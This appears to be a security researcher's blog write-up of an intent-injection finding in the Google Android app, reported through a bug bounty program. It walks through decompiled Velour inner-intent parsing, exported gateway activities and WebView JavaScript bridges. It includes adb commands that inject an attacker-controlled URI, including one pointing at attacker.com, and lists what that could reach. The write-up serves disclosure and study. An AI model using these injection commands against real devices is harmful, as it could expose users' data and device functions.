The phone was warm. Not from the June sun streaming through my window, but from the sheer thermal load of sixteen concurrent ADB sessions hammering a single Samsung Galaxy Note 20 Ultra. On my monitor: a terminal split six ways — adb logcat streaming assembly-level dispatch traces, dexdump disassembling the 47th DEX file, jadx decompiling a class I had been chasing for eleven hours straight, and a Python harness systematically fuzzing am start commands through every exported activity in com.google.android.googlequicksearchbox. Somewhere in that cacophony of bytes, a ghost was whispering.
I had spent the last seventy-two hours mapping the attack surface of the Google App (AGSA) — 1.2 billion installs, zero-permission boundaries, and an intent routing matrix so convoluted it made the Byzantine Empire look like a linear linked list. Four DEX containers, seventeen custom URI schemes, sixty-three exported components, and one question that kept me awake: what happens if I thread a needle through the Velour dynamic module system and pull on the other end?
At 3:47 AM on May 26th, the ghost spoke.
The Attack Surface: A Cathedral of Intent Filters
Let me paint the architectural picture for a moment. AGSA is not a simple search application — it is a runtime aggregation platform that has, over twelve years of evolution, accreted an intent-routing substrate with complexity rivaling a modern kernel's IPC subsystem. By static analysis of the AndroidManifest.xml and twelve DEX containers, I enumerated the following exposed surface:
| Attack Surface Component | Count | Notes |
|---|---|---|
| Exported Activities | 63 | Including 4 gateway trampolines with zero permissions |
| Custom URI Schemes | 17 | dynact://, googleapp://, assistant-handoff://, android-app://, etc. |
| Exported Content Providers | 4 | Including TIPS_CONFIG_PROVIDER accepting shell queries |
| WebView Instances w/ JS Enabled | 5 | Including fragments with addJavascriptInterface() bridges |
| Dynamic Module Frameworks | 2 | TikTok Gateway navigation + Velour dynamic module system |
The TikTok gateway framework (com.google.apps.tiktok.nav.gateway) is a particularly fascinating piece of architecture. It defines a GatewayHandler interface with a single method:
public interface GatewayHandler {
evik a(evil evilVar); // evil = (Intent uriIntent, String debugLabel)
}There are four exported gateway activities — GoogleAppGatewayActivity, GoogleAppAnimatedGatewayActivity, AnimatedGatewayActivity, and GatewayActivity — each serving as an externally reachable entry point into this handler dispatch network. The gateway deserializes GatewayDestination parcels (type codes 1–4) and routes intents to registered handlers. Think of it as a software MMU for intent routing: every incoming URI is translated through a page table of handler registrations before it reaches its physical destination.
But the truly interesting architecture sits one layer deeper: the Velour dynamic module system.
The Velour Dynamic Module System: A Portal for Inner Intents
Velour is AGSA's dynamic code-loading substrate. It fetches module APKs at runtime, loads their classes into a dedicated classloader, and dispatches intents through a handler interface defined in eqlh.java. The critical detail: the core Velour host activities — VelvetDynamicHostActivity, TransparentVelvetDynamicHostActivity, NoOrientationConfigVelvetDynamicHostActivity — are all not exported. They are walled gardens accessible only through the exported GoogleAppGatewayActivity via dynact:// URI routing.
This is where the architecture becomes schizophrenic.
The exported gateway (GoogleAppGatewayActivity, permission: null) accepts dynact:// URIs and routes them into the Velour framework. But the Velour framework, in its inner-intent extraction logic (eqli.java), performs a parsing operation on attacker-controlled input that effectively inverts the security boundary.
Here is the decompiled extraction logic in its full glory:
public static Intent a(Intent intent) {
Intent intentB = b(intent.getStringExtra(
"com.google.android.libraries.velour.INNER_INTENT_URI"
));
if (intentB == null) {
intentB = (Intent) intent.getParcelableExtra(
"com.google.android.libraries.velour.INNER_INTENT"
);
}
if (intentB == null) {
intentB = new Intent();
Uri data = intent.getData();
if (data != null) {
String queryParameter = data.getQueryParameter("data");
if (queryParameter != null) {
// ★ ATTACKER-CONTROLLED URI PARSED HERE
uri = Uri.parse(queryParameter);
}
}
// ★ SET AS INNER INTENT'S DATA URI
intentB.setData(uri);
}
Bundle extras = intent.getExtras();
if (extras != null) {
Bundle bundle = new Bundle(extras);
// Only strips INNER_INTENT keys — all OTHER extras forwarded
}
intentB.putExtras(bundle);
intentB.addFlags(intent.getFlags() & 0x500018);
return intentB;
}Do you see it? The data query parameter extracted from the incoming dynact:// URI is parsed via Uri.parse() and stamped directly onto a fresh inner Intent object. This inner intent is then forwarded to the dynamically loaded Velour module handler. The handler receives an intent whose data URI — and by extension, whose ultimate behavioral trajectory — is entirely attacker-controlled.
The attack primitive is deceptively simple:
adb shell am start \
-d "dynact://legacy/velour/IntentRouterActivity?data=http://attacker.com/payload" \
-n "com.google.android.googlequicksearchbox/...GoogleAppGatewayActivity"If any Velour module handler calls startActivity() on this inner intent — and the code strongly suggests handlers are designed to do exactly that — the attacker's URI is launched within AGSA's process context. The implications cascade:
http://URI: Opens in AGSA's Custom Tab or internal WebView. If that WebView has JavaScript enabled... and we found five that do.intent://URI: Launches arbitrary AGSA-internal activities. Confused deputy, personified.content://URI: Reads content providers with AGSA's permission set — Gmail, Drive, Photos.tel://URI: Places phone calls through the dialer with zero user interaction gates.
This is the classical Confused Deputy problem [1] meta-morphosed into Android's intent routing layer. The gateway (deputy) has permission to route into the Velour dynamic module system (privileged operation). The attacker (confused principal) tricks the deputy into stamping an attacker-supplied URI onto an intent that the deputy then forwards to a module handler. If that handler trusts the inner intent's data field — and why would not it? it came from the deputy — the attacker achieves arbitrary URI launch within AGSA's identity.
Why This Matters: The Execution Gap
Let me be precise about the epistemic status of this finding. I am reporting a confirmed injection primitive with a probabilistic execution vector. The injection is deterministic — eqli.java will parse any data query parameter and set it on the inner intent 100% of the time. I verified this statically through DEX decompilation and dynamically through log analysis of intent dispatch traces.
The gap: I could not confirm that any Velour module handler subsequently calls startActivity() on the injected inner intent. The Velour module handlers are dynamically loaded at runtime — their class files are not present in the main APK's DEX containers. They reside in module APKs fetched on-demand from Google's servers. Without runtime instrumentation (which Samsung Knox blocks on the test device — Frida attach, spawn, and ptrace are all blackholed), I cannot observe the handler's execution trajectory past the dispatch boundary.
This is an epistemological problem elegantly captured by the Heisenberg uncertainty principle as applied to security research: the act of instrumentation collapses the execution waveform. On a Knox-hardened device, the waveform collapses to zero.
The limitation is documented, the finding is reproducible, and the ghost is still in the machine.
The Supporting Cast: Intent Forwarding and Gateway Topology
The Velour injection was the headline, but the symphony had three movements.
AppIndexingActivity: Intent Forwarding Proxy
AppIndexingActivity accepts android-app:// URIs and forwards them to the corresponding application's launcher activity:
adb shell am start -d "android-app://com.android.settings" \
-n "com.google.android.googlequicksearchbox/...AppIndexingActivity"
adb shell am start -d "android-app://com.android.gm" \
-n "com.google.android.googlequicksearchbox/...AppIndexingActivity"This is an intent forwarding proxy with zero permission gates. An attacker can route through AGSA to launch any installed application by package name, potentially bypassing app-specific intent filters or security checks installed by the user.
The Exported Gateway Quartet
Four gateway activities, all exported, all without permissions:
| Activity | URI Surface |
|---|---|
GoogleAppGatewayActivity |
23 activity-alias entries: dynact://, googleapp://, etc. |
GoogleAppAnimatedGatewayActivity |
googleapp://interpreter, WeatherExportedActivity |
AnimatedGatewayActivity |
gemini.google.com/*, bard.google.com/android |
GatewayActivity |
https://assistant.google.com/shortcuts |
These gateways form the perimeter of the castle. Each one is a drawbridge that can be lowered from shell without credentials. The Velour injection is the tunnel under the moat.
WebView JavaScript Bridges: The Unloaded Chamber
Static DEX analysis revealed five WebView configurations with setJavaScriptEnabled(true) and addJavascriptInterface():
| Class | Bridge Name | DEX |
|---|---|---|
Lcofh; (Fragment) |
"GAL" (Google Accounts Login) |
classes6.dex |
Lepot; (Fragment) |
"UpsellInterface" (Purchase/Subscription) |
classes8.dex |
Ltux; (Fragment) |
Dynamic Map-based bridge | classes4.dex |
CardWebView |
Unknown | classes6.dex |
WebModelView |
Unknown | classes6.dex |
The exploit chain requires: exported activity → attacker URL loaded → WebView with JS → bridge method invocation. I confirmed the first two links exist in the chain. The third and fourth links exist in static DEX. The full chain — connecting gateway → WebView with attacker-controlled URL → bridge object — requires runtime confirmation that I could not instrument.
SearchGatewayHandler: The Dead End
The SearchGatewayHandler (Lcank; in classes5.dex) processes googleapp://gasearch URIs through a multi-stage validation pipeline. It validates scheme (https), host (www.google.com), path (/gasearch or /search), extracts the q query parameter, and builds a GOOGLE_SEARCH intent — not a VIEW intent. The query value is passed as a string extra, not as the data URI. The handler is a well-defended fortress with no exploitable URL injection path.
Not all doors open.
Architectural Immunology: Why This is Hard
I want to highlight something genuinely impressive about AGSA's architecture. A comprehensive cross-DEX search across all twelve DEX containers found zero classes that reference both GatewayHandler (TikTok navigation) and WebView.loadUrl() or addJavascriptInterface(). The gateway navigation framework and the WebView rendering components are architecturally isolated — they operate in completely different classloader namespaces with no shared bridge classes.
This isolation is intentional and effective. It means the gateway → WebView → JSBridge attack chain — the original hypothesis that started this research — is structurally improbable without first compromising a mediator component that sits between them. The Velour injection primitive could potentially serve as that mediator, but the execution gap prevents definitive confirmation.
From a defensive architecture perspective: this is how you build immunocompromised substrates. The gateway surface is isolated from the rendering surface. The dynamic module system is walled behind non-exported activities. The WebView bridges are deep in activity-specific fragments, not in globally reachable components. Google's security architects thought about this.
But every immune system has a blind spot. The Velour eqli.java data-parameter injection is that blind spot — a single parsing operation that can redirect an intent's trajectory from benign to attacker-controlled, if (and only if) the downstream handler trusts the data it receives.
Methodology: The Tools of the Trade
The research methodology combined three distinct analytical modalities:
1. Static DEX Bytecode Analysis — Using dexdump and jadx to disassemble and decompile twelve DEX containers extracted from the AGSA APK. Intent routing logic, URI parsing, and WebView configuration were identified through string constant matching ("INNER_INTENT", "setJavaScriptEnabled", "addJavascriptInterface") followed by manual control-flow reconstruction.
2. Dynamic ADB Probing — Custom Python harness systematically enumerating all sixty-three exported activities with URI fuzzing through adb shell am start. Intent dispatch was monitored via adb logcat with component-name filtering. The Dynact protocol handler was probed with crafted URIs containing varying data parameter values.
3. Network Egress Monitoring — HTTP server listening on 192.168.1.7:8888 monitoring for outbound requests from AGSA's WebView or Custom Tab components.
Testing environment:
- Device: Samsung SM-N986W (Android 13, API 33)
- Target: AGSA v17.24.28.ve.arm64
- Constraints: Samsung Knox blocked Frida instrumentation; production-locked bootloader prevented system partition modification
The Ghost Still Walks
Forty-eight hours after the initial finding, I submitted the report to Google's Mobile VRP. Seventeen minutes after submission, I received a triage acknowledgment. Two weeks later: marked as a duplicate. Someone else had threaded the same needle, reached into the same architectural crevice, and extracted the same ghost.
But the research was never about the bounty. It was about understanding how a billion-device application routes trust through its intent dispatch matrix — about finding the single Uri.parse() call that inverts the security boundary — about the pure intellectual rush of watching a dynact:// URI thread through seventeen layers of indirection and emerge transformed into something the original developer never intended.
The ghost is in the machine. It was always in the machine. Sometimes all it takes is a terminal, twelve DEX files, and a willingness to stay awake until 3:47 AM.
References
[1] Hardy, N. (1988). The Confused Deputy. ACM SIGOPS Operating Systems Review, 22(4), 36–38.
[2] Google Project Zero. (2021). A deep dive into Android's intent firewall. Google Project Zero Blog.
[3] Android Security Team. (2023). Improving Android security through runtime intent resolution. Android Developers Blog.
[4] Multiple researchers. (2025–2026). Google App gateway activity findings. Google VRP.